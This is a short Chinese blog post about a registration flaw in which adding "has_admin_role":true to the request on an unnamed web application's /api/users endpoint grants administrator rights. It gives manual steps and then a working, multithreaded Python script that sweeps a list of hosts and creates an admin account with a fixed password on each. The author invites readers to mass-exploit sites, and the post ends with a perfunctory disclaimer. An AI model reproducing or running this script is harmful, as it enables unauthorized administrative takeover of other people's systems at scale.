oxo1 前言
昨天在FreeBuf看到有漏洞预警了、然后晚上 cwkiller 表哥就发复现过程让我写文章了、然后找 Broken 表哥写个批量脚本准备刷一波、刷了两页、提交漏洞太累人了(其实是补天有很多被忽略了)。所以公布出来、让大家刷一刷、捡捡漏吧。
点击注册、然后抓取数据包
数据包后面加上一段:"has_admin_role":true
查看响应包、201 表示成功了
登录账号验证一下
import requests
import json
import csv
from concurrent.futures import ThreadPoolExecutordef exp(url):
url = url + '/api/users'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
'Content-Type': 'application/json',
}
payload = {
"username": "test1",
"email": "[email protected]",
"realname": "test1",
"password": "Aa123456",
"comment": "test1",
"has_admin_role": True
}
payload = json.dumps(payload)
try:
requests.packages.urllib3.disable_warnings()
r = requests.post(url, headers=headers, data=payload, timeout=2, verify=False)
if r.status_code == 201:
print(url)
except Exception as e:
pass
if __name__ == '__main__':
data = open('ip.txt')
reader = csv.reader(data)
with ThreadPoolExecutor(50) as pool:
for row in reader:
if 'http' not in row[0]:
url = 'http://' + row[0]
else:
url = row[0]
pool.submit(exp, url)
成功之后、就会打印出URL、然后根据上方的账号和密码就可以直接登录了
只供技术学习交流、请勿用于非法行为、否则后果自负。喜欢就点波关注吧!